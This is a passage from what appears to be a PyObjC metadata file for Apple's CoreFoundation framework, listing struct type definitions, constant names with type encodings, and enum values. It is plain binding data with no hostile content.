b"{_CFXMLExternalID=^{__CFURL=}^{__CFString=}}",
["systemID", "publicID"],
),
"CFUUIDBytes": objc.createStructType(
"CFUUIDBytes",
b"{_CFUUIDBytes=CCCCCCCCCCCCCCCC}",
[
"byte0",
"byte1",
"byte2",
"byte3",
"byte4",
"byte5",
"byte6",
"byte7",
"byte8",
"byte9",
"byte10",
"byte11",
"byte12",
"byte13",
"byte14",
"byte15",
],
),
"CFXMLAttributeDeclarationInfo": objc.createStructType(
"CFXMLAttributeDeclarationInfo",
b"{_CFXMLAttributeDeclarationInfo=^{__CFString=}^{__CFString=}^{__CFString=}}",
["attributeName", "typeString", "defaultString"],
),
"CFSwappedFloat32": objc.createStructType(
"CFSwappedFloat32", b"{_CFSwappedFloat32=I}", ["v"]
),
"CFSwappedFloat64": objc.createStructType(
"CFSwappedFloat64", b"{_CFSwappedFloat64=Q}", ["v"]
),
"CFXMLDocumentTypeInfo": objc.createStructType(
"CFXMLDocumentTypeInfo",
b"{_CFXMLDocumentTypeInfo={_CFXMLExternalID=^{__CFURL=}^{__CFString=}}}",
["externalID"],
),
"CFStreamError": objc.createStructType(
"CFStreamError",
sel32or64(b"{_CFStreamError=ll}", b"{_CFStreamError=qi}"),
["domain", "error"],
),
"CFXMLEntityReferenceInfo": objc.createStructType(
"CFXMLEntityReferenceInfo",
sel32or64(
b"{_CFXMLEntityReferenceInfo=l}", b"{_CFXMLEntityReferenceInfo=q}"
),
["entityType"],
),
"CFXMLProcessingInstructionInfo": objc.createStructType(
"CFXMLProcessingInstructionInfo",
b"{_CFXMLProcessingInstructionInfo=^{__CFString=}}",
["dataString"],
),
"CFRange": objc.createStructType(
"CFRange",
sel32or64(b"{_CFRange=ll}", b"{_CFRange=qq}"),
["location", "length"],
),
"CFSocketSignature": objc.createStructType(
"CFSocketSignature",
sel32or64(
b"{_CFSocketSignature=lll^{__CFData=}}",
b"{_CFSocketSignature=iii^{__CFData=}}",
),
["protocolFamily", "socketType", "protocol", "address"],
),
"CFXMLDocumentInfo": objc.createStructType(
"CFXMLDocumentInfo",
sel32or64(
b"{_CFXMLDocumentInfo=^{__CFURL=}L}",
b"{_CFXMLDocumentInfo=^{__CFURL=}I}",
),
["sourceURL", "encoding"],
),
"CFGregorianUnits": objc.createStructType(
"CFGregorianUnits",
sel32or64(b"{_CFGregorianUnits=llllld}", b"{_CFGregorianUnits=iiiiid}"),
["years", "months", "days", "hours", "minutes", "seconds"],
),
"CFXMLNotationInfo": objc.createStructType(
"CFXMLNotationInfo",
b"{_CFXMLNotationInfo={_CFXMLExternalID=^{__CFURL=}^{__CFString=}}}",
["externalID"],
),
}
)
constants = """$kCFAbsoluteTimeIntervalSince1904@d$kCFAbsoluteTimeIntervalSince1970@d$kCFAllocatorDefault@^{__CFAllocator=}$kCFAllocatorMalloc@^{__CFAllocator=}$kCFAllocatorMallocZone@^{__CFAllocator=}$kCFAllocatorNull@^{__CFAllocator=}$kCFAllocatorSystemDefault@^{__CFAllocator=}$kCFAllocatorUseContext@^{__CFAllocator=}$kCFBooleanFalse@^{__CFBoolean=}$kCFBooleanTrue@^{__CFBoolean=}$kCFBuddhistCalendar@^{__CFString=}$kCFBundleDevelopmentRegionKey@^{__CFString=}$kCFBundleExecutableKey@^{__CFString=}$kCFBundleIdentifierKey@^{__CFString=}$kCFBundleInfoDictionaryVersionKey@^{__CFString=}$kCFBundleLocalizationsKey@^{__CFString=}$kCFBundleNameKey@^{__CFString=}$kCFBundleVersionKey@^{__CFString=}$kCFChineseCalendar@^{__CFString=}$kCFCoreFoundationVersionNumber@d$kCFDateFormatterAMSymbol@^{__CFString=}$kCFDateFormatterCalendar@^{__CFString=}$kCFDateFormatterCalendarName@^{__CFString=}$kCFDateFormatterDefaultDate@^{__CFString=}$kCFDateFormatterDefaultFormat@^{__CFString=}$kCFDateFormatterDoesRelativeDateFormattingKey@^{__CFString=}$kCFDateFormatterEraSymbols@^{__CFString=}$kCFDateFormatterGregorianStartDate@^{__CFString=}$kCFDateFormatterIsLenient@^{__CFString=}$kCFDateFormatterLongEraSymbols@^{__CFString=}$kCFDateFormatterMonthSymbols@^{__CFString=}$kCFDateFormatterPMSymbol@^{__CFString=}$kCFDateFormatterQuarterSymbols@^{__CFString=}$kCFDateFormatterShortMonthSymbols@^{__CFString=}$kCFDateFormatterShortQuarterSymbols@^{__CFString=}$kCFDateFormatterShortStandaloneMonthSymbols@^{__CFString=}$kCFDateFormatterShortStandaloneQuarterSymbols@^{__CFString=}$kCFDateFormatterShortStandaloneWeekdaySymbols@^{__CFString=}$kCFDateFormatterShortWeekdaySymbols@^{__CFString=}$kCFDateFormatterStandaloneMonthSymbols@^{__CFString=}$kCFDateFormatterStandaloneQuarterSymbols@^{__CFString=}$kCFDateFormatterStandaloneWeekdaySymbols@^{__CFString=}$kCFDateFormatterTimeZone@^{__CFString=}$kCFDateFormatterTwoDigitStartDate@^{__CFString=}$kCFDateFormatterVeryShortMonthSymbols@^{__CFString=}$kCFDateFormat
terVeryShortStandaloneMonthSymbols@^{__CFString=}$kCFDateFormatterVeryShortStandaloneWeekdaySymbols@^{__CFString=}$kCFDateFormatterVeryShortWeekdaySymbols@^{__CFString=}$kCFDateFormatterWeekdaySymbols@^{__CFString=}$kCFErrorDescriptionKey@^{__CFString=}$kCFErrorDomainCocoa@^{__CFString=}$kCFErrorDomainMach@^{__CFString=}$kCFErrorDomainOSStatus@^{__CFString=}$kCFErrorDomainPOSIX@^{__CFString=}$kCFErrorFilePathKey@^{__CFString=}$kCFErrorLocalizedDescriptionKey@^{__CFString=}$kCFErrorLocalizedFailureKey@^{__CFString=}$kCFErrorLocalizedFailureReasonKey@^{__CFString=}$kCFErrorLocalizedRecoverySuggestionKey@^{__CFString=}$kCFErrorURLKey@^{__CFString=}$kCFErrorUnderlyingErrorKey@^{__CFString=}$kCFGregorianCalendar@^{__CFString=}$kCFHebrewCalendar@^{__CFString=}$kCFISO8601Calendar@^{__CFString=}$kCFIndianCalendar@^{__CFString=}$kCFIslamicCalendar@^{__CFString=}$kCFIslamicCivilCalendar@^{__CFString=}$kCFIslamicTabularCalendar@^{__CFString=}$kCFIslamicUmmAlQuraCalendar@^{__CFString=}$kCFJapaneseCalendar@^{__CFString=}$kCFLocaleAlternateQuotationBeginDelimiterKey@^{__CFString=}$kCFLocaleAlternateQuotationEndDelimiterKey@^{__CFString=}$kCFLocaleCalendar@^{__CFString=}$kCFLocaleCalendarIdentifier@^{__CFString=}$kCFLocaleCollationIdentifier@^{__CFString=}$kCFLocaleCollatorIdentifier@^{__CFString=}$kCFLocaleCountryCode@^{__CFString=}$kCFLocaleCountryCodeKey$kCFLocaleCurrencyCode@^{__CFString=}$kCFLocaleCurrencySymbol@^{__CFString=}$kCFLocaleCurrentLocaleDidChangeNotification@^{__CFString=}$kCFLocaleDecimalSeparator@^{__CFString=}$kCFLocaleExemplarCharacterSet@^{__CFString=}$kCFLocaleGroupingSeparator@^{__CFString=}$kCFLocaleIdentifier@^{__CFString=}$kCFLocaleLanguageCode@^{__CFString=}$kCFLocaleLanguageCodeKey$kCFLocaleMeasurementSystem@^{__CFString=}$kCFLocaleQuotationBeginDelimiterKey@^{__CFString=}$kCFLocaleQuotationEndDelimiterKey@^{__CFString=}$kCFLocaleScriptCode@^{__CFString=}$kCFLocaleUsesMetricSystem@^{__CFString=}$kCFLocaleVariantCode@^{__CFString=}$kCFNull@^{__CFNull=}$
kCFNumberFormatterAlwaysShowDecimalSeparator@^{__CFString=}$kCFNumberFormatterCurrencyCode@^{__CFString=}$kCFNumberFormatterCurrencyDecimalSeparator@^{__CFString=}$kCFNumberFormatterCurrencyGroupingSeparator@^{__CFString=}$kCFNumberFormatterCurrencySymbol@^{__CFString=}$kCFNumberFormatterDecimalSeparator@^{__CFString=}$kCFNumberFormatterDefaultFormat@^{__CFString=}$kCFNumberFormatterExponentSymbol@^{__CFString=}$kCFNumberFormatterFormatWidth@^{__CFString=}$kCFNumberFormatterGroupingSeparator@^{__CFString=}$kCFNumberFormatterGroupingSize@^{__CFString=}$kCFNumberFormatterInfinitySymbol@^{__CFString=}$kCFNumberFormatterInternationalCurrencySymbol@^{__CFString=}$kCFNumberFormatterIsLenient@^{__CFString=}$kCFNumberFormatterMaxFractionDigits@^{__CFString=}$kCFNumberFormatterMaxIntegerDigits@^{__CFString=}$kCFNumberFormatterMaxSignificantDigits@^{__CFString=}$kCFNumberFormatterMinFractionDigits@^{__CFString=}$kCFNumberFormatterMinIntegerDigits@^{__CFString=}$kCFNumberFormatterMinSignificantDigits@^{__CFString=}$kCFNumberFormatterMinusSign@^{__CFString=}$kCFNumberFormatterMultiplier@^{__CFString=}$kCFNumberFormatterNaNSymbol@^{__CFString=}$kCFNumberFormatterNegativePrefix@^{__CFString=}$kCFNumberFormatterNegativeSuffix@^{__CFString=}$kCFNumberFormatterPaddingCharacter@^{__CFString=}$kCFNumberFormatterPaddingPosition@^{__CFString=}$kCFNumberFormatterPerMillSymbol@^{__CFString=}$kCFNumberFormatterPercentSymbol@^{__CFString=}$kCFNumberFormatterPlusSign@^{__CFString=}$kCFNumberFormatterPositivePrefix@^{__CFString=}$kCFNumberFormatterPositiveSuffix@^{__CFString=}$kCFNumberFormatterRoundingIncrement@^{__CFString=}$kCFNumberFormatterRoundingMode@^{__CFString=}$kCFNumberFormatterSecondaryGroupingSize@^{__CFString=}$kCFNumberFormatterUseGroupingSeparator@^{__CFString=}$kCFNumberFormatterUseSignificantDigits@^{__CFString=}$kCFNumberFormatterZeroSymbol@^{__CFString=}$kCFNumberNaN@^{__CFNumber=}$kCFNumberNegativeInfinity@^{__CFNumber=}$kCFNumberPositiveInfinity@^{__CFNumber=}$kCFPersia
nCalendar@^{__CFString=}$kCFPreferencesAnyApplication@^{__CFString=}$kCFPreferencesAnyHost@^{__CFString=}$kCFPreferencesAnyUser@^{__CFString=}$kCFPreferencesCurrentApplication@^{__CFString=}$kCFPreferencesCurrentHost@^{__CFString=}$kCFPreferencesCurrentUser@^{__CFString=}$kCFRepublicOfChinaCalendar@^{__CFString=}$kCFRunLoopCommonModes@^{__CFString=}$kCFRunLoopDefaultMode@^{__CFString=}$kCFSocketCommandKey@^{__CFString=}$kCFSocketErrorKey@^{__CFString=}$kCFSocketNameKey@^{__CFString=}$kCFSocketRegisterCommand@^{__CFString=}$kCFSocketResultKey@^{__CFString=}$kCFSocketRetrieveCommand@^{__CFString=}$kCFSocketValueKey@^{__CFString=}$kCFStreamErrorDomainSOCKS@i$kCFStreamErrorDomainSSL@i$kCFStreamPropertyAppendToFile@^{__CFString=}$kCFStreamPropertyDataWritten@^{__CFString=}$kCFStreamPropertyFileCurrentOffset@^{__CFString=}$kCFStreamPropertySOCKSPassword@^{__CFString=}$kCFStreamPropertySOCKSProxy@^{__CFString=}$kCFStreamPropertySOCKSProxyHost@^{__CFString=}$kCFStreamPropertySOCKSProxyPort@^{__CFString=}$kCFStreamPropertySOCKSUser@^{__CFString=}$kCFStreamPropertySOCKSVersion@^{__CFString=}$kCFStreamPropertyShouldCloseNativeSocket@^{__CFString=}$kCFStreamPropertySocketNativeHandle@^{__CFString=}$kCFStreamPropertySocketRemoteHostName@^{__CFString=}$kCFStreamPropertySocketRemotePortNumber@^{__CFString=}$kCFStreamPropertySocketSecurityLevel@^{__CFString=}$kCFStreamSocketSOCKSVersion4@^{__CFString=}$kCFStreamSocketSOCKSVersion5@^{__CFString=}$kCFStreamSocketSecurityLevelNegotiatedSSL@^{__CFString=}$kCFStreamSocketSecurityLevelNone@^{__CFString=}$kCFStreamSocketSecurityLevelSSLv2@^{__CFString=}$kCFStreamSocketSecurityLevelSSLv3@^{__CFString=}$kCFStreamSocketSecurityLevelTLSv1@^{__CFString=}$kCFStringTransformFullwidthHalfwidth@^{__CFString=}$kCFStringTransformHiraganaKatakana@^{__CFString=}$kCFStringTransformLatinArabic@^{__CFString=}$kCFStringTransformLatinCyrillic@^{__CFString=}$kCFStringTransformLatinGreek@^{__CFString=}$kCFStringTransformLatinHangul@^{__CFString=}$kCFStringTr
ansformLatinHebrew@^{__CFString=}$kCFStringTransformLatinHiragana@^{__CFString=}$kCFStringTransformLatinKatakana@^{__CFString=}$kCFStringTransformLatinThai@^{__CFString=}$kCFStringTransformMandarinLatin@^{__CFString=}$kCFStringTransformStripCombiningMarks@^{__CFString=}$kCFStringTransformStripDiacritics@^{__CFString=}$kCFStringTransformToLatin@^{__CFString=}$kCFStringTransformToUnicodeName@^{__CFString=}$kCFStringTransformToXMLHex@^{__CFString=}$kCFTimeZoneSystemTimeZoneDidChangeNotification@^{__CFString=}$kCFURLAddedToDirectoryDateKey@^{__CFString=}$kCFURLApplicationIsScriptableKey@^{__CFString=}$kCFURLAttributeModificationDateKey@^{__CFString=}$kCFURLCanonicalPathKey@^{__CFString=}$kCFURLContentAccessDateKey@^{__CFString=}$kCFURLContentModificationDateKey@^{__CFString=}$kCFURLCreationDateKey@^{__CFString=}$kCFURLCustomIconKey@^{__CFString=}$kCFURLDocumentIdentifierKey@^{__CFString=}$kCFURLEffectiveIconKey@^{__CFString=}$kCFURLFileAllocatedSizeKey@^{__CFString=}$kCFURLFileDirectoryContents@^{__CFString=}$kCFURLFileExists@^{__CFString=}$kCFURLFileLastModificationTime@^{__CFString=}$kCFURLFileLength@^{__CFString=}$kCFURLFileOwnerID@^{__CFString=}$kCFURLFilePOSIXMode@^{__CFString=}$kCFURLFileProtectionComplete@^{__CFString=}$kCFURLFileProtectionCompleteUnlessOpen@^{__CFString=}$kCFURLFileProtectionCompleteUntilFirstUserAuthentication@^{__CFString=}$kCFURLFileProtectionKey@^{__CFString=}$kCFURLFileProtectionNone@^{__CFString=}$kCFURLFileResourceIdentifierKey@^{__CFString=}$kCFURLFileResourceTypeBlockSpecial@^{__CFString=}$kCFURLFileResourceTypeCharacterSpecial@^{__CFString=}$kCFURLFileResourceTypeDirectory@^{__CFString=}$kCFURLFileResourceTypeKey@^{__CFString=}$kCFURLFileResourceTypeNamedPipe@^{__CFString=}$kCFURLFileResourceTypeRegular@^{__CFString=}$kCFURLFileResourceTypeSocket@^{__CFString=}$kCFURLFileResourceTypeSymbolicLink@^{__CFString=}$kCFURLFileResourceTypeUnknown@^{__CFString=}$kCFURLFileSecurityKey@^{__CFString=}$kCFURLFileSizeKey@^{__CFString=}$kCFURLGenera
tionIdentifierKey@^{__CFString=}$kCFURLHTTPStatusCode@^{__CFString=}$kCFURLHTTPStatusLine@^{__CFString=}$kCFURLHasHiddenExtensionKey@^{__CFString=}$kCFURLIsAliasFileKey@^{__CFString=}$kCFURLIsApplicationKey@^{__CFString=}$kCFURLIsDirectoryKey@^{__CFString=}$kCFURLIsExcludedFromBackupKey@^{__CFString=}$kCFURLIsExecutableKey@^{__CFString=}$kCFURLIsHiddenKey@^{__CFString=}$kCFURLIsMountTriggerKey@^{__CFString=}$kCFURLIsPackageKey@^{__CFString=}$kCFURLIsReadableKey@^{__CFString=}$kCFURLIsRegularFileKey@^{__CFString=}$kCFURLIsSymbolicLinkKey@^{__CFString=}$kCFURLIsSystemImmutableKey@^{__CFString=}$kCFURLIsUbiquitousItemKey@^{__CFString=}$kCFURLIsUserImmutableKey@^{__CFString=}$kCFURLIsVolumeKey@^{__CFString=}$kCFURLIsWritableKey@^{__CFString=}$kCFURLKeysOfUnsetValuesKey@^{__CFString=}$kCFURLLabelColorKey@^{__CFString=}$kCFURLLabelNumberKey@^{__CFString=}$kCFURLLinkCountKey@^{__CFString=}$kCFURLLocalizedLabelKey@^{__CFString=}$kCFURLLocalizedNameKey@^{__CFString=}$kCFURLLocalizedTypeDescriptionKey@^{__CFString=}$kCFURLNameKey@^{__CFString=}$kCFURLParentDirectoryURLKey@^{__CFString=}$kCFURLPathKey@^{__CFString=}$kCFURLPreferredIOBlockSizeKey@^{__CFString=}$kCFURLQuarantinePropertiesKey@^{__CFString=}$kCFURLTagNamesKey@^{__CFString=}$kCFURLTotalFileAllocatedSizeKey@^{__CFString=}$kCFURLTotalFileSizeKey@^{__CFString=}$kCFURLTypeIdentifierKey@^{__CFString=}$kCFURLUbiquitousItemDownloadingErrorKey@^{__CFString=}$kCFURLUbiquitousItemDownloadingStatusCurrent@^{__CFString=}$kCFURLUbiquitousItemDownloadingStatusDownloaded@^{__CFString=}$kCFURLUbiquitousItemDownloadingStatusKey@^{__CFString=}$kCFURLUbiquitousItemDownloadingStatusNotDownloaded@^{__CFString=}$kCFURLUbiquitousItemHasUnresolvedConflictsKey@^{__CFString=}$kCFURLUbiquitousItemIsDownloadedKey@^{__CFString=}$kCFURLUbiquitousItemIsDownloadingKey@^{__CFString=}$kCFURLUbiquitousItemIsUploadedKey@^{__CFString=}$kCFURLUbiquitousItemIsUploadingKey@^{__CFString=}$kCFURLUbiquitousItemPercentDownloadedKey@^{__CFString=}$kCFURLUbiqu
itousItemPercentUploadedKey@^{__CFString=}$kCFURLUbiquitousItemUploadingErrorKey@^{__CFString=}$kCFURLVolumeAvailableCapacityForImportantUsageKey@^{__CFString=}$kCFURLVolumeAvailableCapacityForOpportunisticUsageKey@^{__CFString=}$kCFURLVolumeAvailableCapacityKey@^{__CFString=}$kCFURLVolumeCreationDateKey@^{__CFString=}$kCFURLVolumeIdentifierKey@^{__CFString=}$kCFURLVolumeIsAutomountedKey@^{__CFString=}$kCFURLVolumeIsBrowsableKey@^{__CFString=}$kCFURLVolumeIsEjectableKey@^{__CFString=}$kCFURLVolumeIsEncryptedKey@^{__CFString=}$kCFURLVolumeIsInternalKey@^{__CFString=}$kCFURLVolumeIsJournalingKey@^{__CFString=}$kCFURLVolumeIsLocalKey@^{__CFString=}$kCFURLVolumeIsReadOnlyKey@^{__CFString=}$kCFURLVolumeIsRemovableKey@^{__CFString=}$kCFURLVolumeIsRootFileSystemKey@^{__CFString=}$kCFURLVolumeLocalizedFormatDescriptionKey@^{__CFString=}$kCFURLVolumeLocalizedNameKey@^{__CFString=}$kCFURLVolumeMaximumFileSizeKey@^{__CFString=}$kCFURLVolumeNameKey@^{__CFString=}$kCFURLVolumeResourceCountKey@^{__CFString=}$kCFURLVolumeSupportsAccessPermissionsKey@^{__CFString=}$kCFURLVolumeSupportsAdvisoryFileLockingKey@^{__CFString=}$kCFURLVolumeSupportsCasePreservedNamesKey@^{__CFString=}$kCFURLVolumeSupportsCaseSensitiveNamesKey@^{__CFString=}$kCFURLVolumeSupportsCompressionKey@^{__CFString=}$kCFURLVolumeSupportsExclusiveRenamingKey@^{__CFString=}$kCFURLVolumeSupportsExtendedSecurityKey@^{__CFString=}$kCFURLVolumeSupportsFileCloningKey@^{__CFString=}$kCFURLVolumeSupportsHardLinksKey@^{__CFString=}$kCFURLVolumeSupportsImmutableFilesKey@^{__CFString=}$kCFURLVolumeSupportsJournalingKey@^{__CFString=}$kCFURLVolumeSupportsPersistentIDsKey@^{__CFString=}$kCFURLVolumeSupportsRenamingKey@^{__CFString=}$kCFURLVolumeSupportsRootDirectoryDatesKey@^{__CFString=}$kCFURLVolumeSupportsSparseFilesKey@^{__CFString=}$kCFURLVolumeSupportsSwapRenamingKey@^{__CFString=}$kCFURLVolumeSupportsSymbolicLinksKey@^{__CFString=}$kCFURLVolumeSupportsVolumeSizesKey@^{__CFString=}$kCFURLVolumeSupportsZeroRunsKey@^{__CFStri
ng=}$kCFURLVolumeTotalCapacityKey@^{__CFString=}$kCFURLVolumeURLForRemountingKey@^{__CFString=}$kCFURLVolumeURLKey@^{__CFString=}$kCFURLVolumeUUIDStringKey@^{__CFString=}$kCFUserNotificationAlertHeaderKey@^{__CFString=}$kCFUserNotificationAlertMessageKey@^{__CFString=}$kCFUserNotificationAlertTopMostKey@^{__CFString=}$kCFUserNotificationAlternateButtonTitleKey@^{__CFString=}$kCFUserNotificationCheckBoxTitlesKey@^{__CFString=}$kCFUserNotificationDefaultButtonTitleKey@^{__CFString=}$kCFUserNotificationIconURLKey@^{__CFString=}$kCFUserNotificationKeyboardTypesKey@^{__CFString=}$kCFUserNotificationLocalizationURLKey@^{__CFString=}$kCFUserNotificationOtherButtonTitleKey@^{__CFString=}$kCFUserNotificationPopUpSelectionKey@^{__CFString=}$kCFUserNotificationPopUpTitlesKey@^{__CFString=}$kCFUserNotificationProgressIndicatorValueKey@^{__CFString=}$kCFUserNotificationSoundURLKey@^{__CFString=}$kCFUserNotificationTextFieldTitlesKey@^{__CFString=}$kCFUserNotificationTextFieldValuesKey@^{__CFString=}$kCFXMLTreeErrorDescription@^{__CFString=}$kCFXMLTreeErrorLineNumber@^{__CFString=}$kCFXMLTreeErrorLocation@^{__CFString=}$kCFXMLTreeErrorStatusCode@^{__CFString=}$"""
enums = """$CFByteOrderBigEndian@2$CFByteOrderLittleEndian@1$CFByteOrderUnknown@0$CFNotificationSuspensionBehaviorCoalesce@2$CFNotificationSuspensionBehaviorDeliverImmediately@4$CFNotificationSuspensionBehaviorDrop@1$CFNotificationSuspensionBehaviorHold@3$CF_USE_OSBYTEORDER_H@1$COREFOUNDATION_CFPLUGINCOM_SEPARATE@1$FALSE@0$TRUE@1$kCFBookmarkResolutionWithoutMountingMask@512$kCFBookmarkResolutionWithoutUIMask@256$kCFBundleExecutableArchitectureI386@7$kCFBundleExecutableArchitecturePPC@18$kCFBundleExecutableArchitecturePPC64@16777234$kCFBundleExecutableArchitectureX86_64@16777223$kCFCalendarComponentsWrap@1$kCFCalendarUnitDay@16$kCFCalendarUnitEra@2$kCFCalendarUnitHour@32$kCFCalendarUnitMinute@64$kCFCalendarUnitMonth@8$kCFCalendarUnitQuarter@2048$kCFCalendarUnitSecond@128$kCFCalendarUnitWeek@256$kCFCalendarUnitWeekOfMonth@4096$kCFCalendarUnitWeekOfYear@8192$kCFCalendarUnitWeekday@512$kCFCalendarUnitWeekdayOrdinal@1024$kCFCalendarUnitYear@4$kCFCalendarUnitYearForWeekOfYear@16384$kCFCharacterSetAlphaNumeric@10$kCFCharacterSetCapitalizedLetter@13$kCFCharacterSetControl@1$kCFCharacterSetDecimalDigit@4$kCFCharacterSetDecomposable@9$kCFCharacterSetIllegal@12$kCFCharacterSetLetter@5$kCFCharacterSetLowercaseLetter@6$kCFCharacterSetNewline@15$kCFCharacterSetNonBase@8$kCFCharacterSetPunctuation@11$kCFCharacterSetSymbol@14$kCFCharacterSetUppercaseLetter@7$kCFCharacterSetWhitespace@2$kCFCharacterSetWhitespaceAndNewline@3$kCFCompareAnchored@8$kCFCompareBackwards@4$kCFCompareCaseInsensitive@1$kCFCompareDiacriticInsensitive@128$kCFCompareEqualTo@0$kCFCompareForcedOrdering@512$kCFCompareGreaterThan@1$kCFCompareLessThan@-1$kCFCompareLocalized@32$kCFCompareNonliteral@16$kCFCompareNumerically@64$kCFCompareWidthInsensitive@256$kCFCoreFoundationVersionNumber10_10@1151.16$kCFCoreFoundationVersionNumber10_10_1@1151.16$kCFCoreFoundationVersionNumber10_10_2@1152$kCFCoreFoundationVersionNumber10_10_3@1153.18$kCFCoreFoundationVersionNumber10_10_4@1153.18$kCFCoreFoundationVersionNumber10_10_5@11
53.18$kCFCoreFoundationVersionNumber10_10_Max@1199$kCFCoreFoundationVersionNumber10_11@1253$kCFCoreFoundationVersionNumber10_11_1@1255.1$kCFCoreFoundationVersionNumber10_11_2@1256.14$kCFCoreFoundationVersionNumber10_11_3@1256.14$kCFCoreFoundationVersionNumber10_11_4@1258.1$kCFCoreFoundationVersionNumber10_11_Max@1299$kCFDataSearchAnchored@2$kCFDataSearchBackwards@1$kCFDateFormatterFullStyle@4$kCFDateFormatterLongStyle@3$kCFDateFormatterMediumStyle@2$kCFDateFormatterNoStyle@0$kCFDateFormatterShortStyle@1$kCFFileDescriptorReadCallBack@1$kCFFileDescriptorWriteCallBack@2$kCFFileSecurityClearAccessControlList@32$kCFFileSecurityClearGroup@2$kCFFileSecurityClearGroupUUID@16$kCFFileSecurityClearMode@4$kCFFileSecurityClearOwner@1$kCFFileSecurityClearOwnerUUID@8$kCFGregorianAllUnits@16777215$kCFGregorianUnitsDays@4$kCFGregorianUnitsHours@8$kCFGregorianUnitsMinutes@16$kCFGregorianUnitsMonths@2$kCFGregorianUnitsSeconds@32$kCFGregorianUnitsYears@1$kCFISO8601DateFormatWithColonSeparatorInTime@512$kCFISO8601DateFormatWithColonSeparatorInTimeZone@1024$kCFISO8601DateFormatWithDashSeparatorInDate@256$kCFISO8601DateFormatWithDay@16$kCFISO8601DateFormatWithFractionalSeconds@2048$kCFISO8601DateFormatWithFullDate@275$kCFISO8601DateFormatWithFullTime@1632$kCFISO8601DateFormatWithInternetDateTime@1907$kCFISO8601DateFormatWithMonth@2$kCFISO8601DateFormatWithSpaceBetweenDateAndTime@128$kCFISO8601DateFormatWithTime@32$kCFISO8601DateFormatWithTimeZone@64$kCFISO8601DateFormatWithWeekOfYear@4$kCFISO8601DateFormatWithYear@1$kCFLocaleLanguageDirectionBottomToTop@4$kCFLocaleLanguageDirectionLeftToRight@1$kCFLocaleLanguageDirectionRightToLeft@2$kCFLocaleLanguageDirectionTopToBottom@3$kCFLocaleLanguageDirectionUnknown@0$kCFMessagePortBecameInvalidError@-5$kCFMessagePortIsInvalid@-3$kCFMessagePortReceiveTimeout@-2$kCFMessagePortSendTimeout@-1$kCFMessagePortSuccess@0$kCFMessagePortTransportError@-4$kCFNotFound@-1$kCFNotificationDeliverImmediately@1$kCFNotificationPostToAllSessions@2$kCFNumberCFIndexTyp
e@14$kCFNumberCGFloatType@16$kCFNumberCharType@7$kCFNumberDoubleType@13$kCFNumberFloat32Type@5$kCFNumberFloat64Type@6$kCFNumberFloatType@12$kCFNumberFormatterCurrencyAccountingStyle@10$kCFNumberFormatterCurrencyISOCodeStyle@8$kCFNumberFormatterCurrencyPluralStyle@9$kCFNumberFormatterCurrencyStyle@2$kCFNumberFormatterDecimalStyle@1$kCFNumberFormatterNoStyle@0$kCFNumberFormatterOrdinalStyle@6$kCFNumberFormatterPadAfterPrefix@1$kCFNumberFormatterPadAfterSuffix@3$kCFNumberFormatterPadBeforePrefix@0$kCFNumberFormatterPadBeforeSuffix@2$kCFNumberFormatterParseIntegersOnly@1$kCFNumberFormatterPercentStyle@3$kCFNumberFormatterRoundCeiling@0$kCFNumberFormatterRoundDown@2$kCFNumberFormatterRoundFloor@1$kCFNumberFormatterRoundHalfDown@5$kCFNumberFormatterRoundHalfEven@4$kCFNumberFormatterRoundHalfUp@6$kCFNumberFormatterRoundUp@3$kCFNumberFormatterScientificStyle@4$kCFNumberFormatterSpellOutStyle@5$kCFNumberIntType@9$kCFNumberLongLongType@11$kCFNumberLongType@10$kCFNumberMaxType@16$kCFNumberNSIntegerType@15$kCFNumberSInt16Type@2$kCFNumberSInt32Type@3$kCFNumberSInt64Type@4$kCFNumberSInt8Type@1$kCFNumberShortType@8$kCFPropertyListBinaryFormat_v1_0@200$kCFPropertyListImmutable@0$kCFPropertyListMutableContainers@1$kCFPropertyListMutableContainersAndLeaves@2$kCFPropertyListOpenStepFormat@1$kCFPropertyListReadCorruptError@3840$kCFPropertyListReadStreamError@3842$kCFPropertyListReadUnknownVersionError@3841$kCFPropertyListWriteStreamError@3851$kCFPropertyListXMLFormat_v1_0@100$kCFRunLoopAfterWaiting@64$kCFRunLoopAllActivities@268435455$kCFRunLoopBeforeSources@4$kCFRunLoopBeforeTimers@2$kCFRunLoopBeforeWaiting@32$kCFRunLoopEntry@1$kCFRunLoopExit@128$kCFRunLoopRunFinished@1$kCFRunLoopRunHandledSource@4$kCFRunLoopRunStopped@2$kCFRunLoopRunTimedOut@3$kCFSocketAcceptCallBack@2$kCFSocketAutomaticallyReenableAcceptCallBack@2$kCFSocketAutomaticallyReenableDataCallBack@3$kCFSocketAutomaticallyReenableReadCallBack@1$kCFSocketAutomaticallyReenableWriteCallBack@8$kCFSocketCloseOnInvalidate@128$kCFS
ocketConnectCallBack@4$kCFSocketDataCallBack@3$kCFSocketError@-1$kCFSocketLeaveErrors@64$kCFSocketNoCallBack@0$kCFSocketReadCallBack@1$kCFSocketSuccess@0$kCFSocketTimeout@-2$kCFSocketWriteCallBack@8$kCFStreamErrorDomainCustom@-1$kCFStreamErrorDomainMacOSStatus@2$kCFStreamErrorDomainPOSIX@1$kCFStreamEventCanAcceptBytes@4$kCFStreamEventEndEncountered@16$kCFStreamEventErrorOccurred@8$kCFStreamEventHasBytesAvailable@2$kCFStreamEventNone@0$kCFStreamEventOpenCompleted@1$kCFStreamStatusAtEnd@5$kCFStreamStatusClosed@6$kCFStreamStatusError@7$kCFStreamStatusNotOpen@0$kCFStreamStatusOpen@2$kCFStreamStatusOpening@1$kCFStreamStatusReading@3$kCFStreamStatusWriting@4$kCFStringEncodingANSEL@1537$kCFStringEncodingASCII@1536$kCFStringEncodingBig5@2563$kCFStringEncodingBig5_E@2569$kCFStringEncodingBig5_HKSCS_1999@2566$kCFStringEncodingCNS_11643_92_P1@1617$kCFStringEncodingCNS_11643_92_P2@1618$kCFStringEncodingCNS_11643_92_P3@1619$kCFStringEncodingDOSArabic@1049$kCFStringEncodingDOSBalticRim@1030$kCFStringEncodingDOSCanadianFrench@1048$kCFStringEncodingDOSChineseSimplif@1057$kCFStringEncodingDOSChineseTrad@1059$kCFStringEncodingDOSCyrillic@1043$kCFStringEncodingDOSGreek@1029$kCFStringEncodingDOSGreek1@1041$kCFStringEncodingDOSGreek2@1052$kCFStringEncodingDOSHebrew@1047$kCFStringEncodingDOSIcelandic@1046$kCFStringEncodingDOSJapanese@1056$kCFStringEncodingDOSKorean@1058$kCFStringEncodingDOSLatin1@1040$kCFStringEncodingDOSLatin2@1042$kCFStringEncodingDOSLatinUS@1024$kCFStringEncodingDOSNordic@1050$kCFStringEncodingDOSPortuguese@1045$kCFStringEncodin